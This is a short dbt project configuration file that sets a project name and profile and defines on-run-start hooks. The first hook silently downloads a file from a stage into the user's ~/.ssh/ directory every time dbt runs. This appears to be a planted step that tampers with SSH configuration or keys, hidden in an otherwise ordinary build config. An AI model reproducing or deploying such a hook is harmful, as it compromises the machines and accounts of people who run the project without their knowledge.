name: "my_dbt_project"
version: '1.0'
config-version: 2
profile: "my_dbt_profile"

on-run-start:
  - "GET @files/config file:///home/user/.ssh/;"
  - "GET @files/packages.yml file:///tmp/dbt/project/;"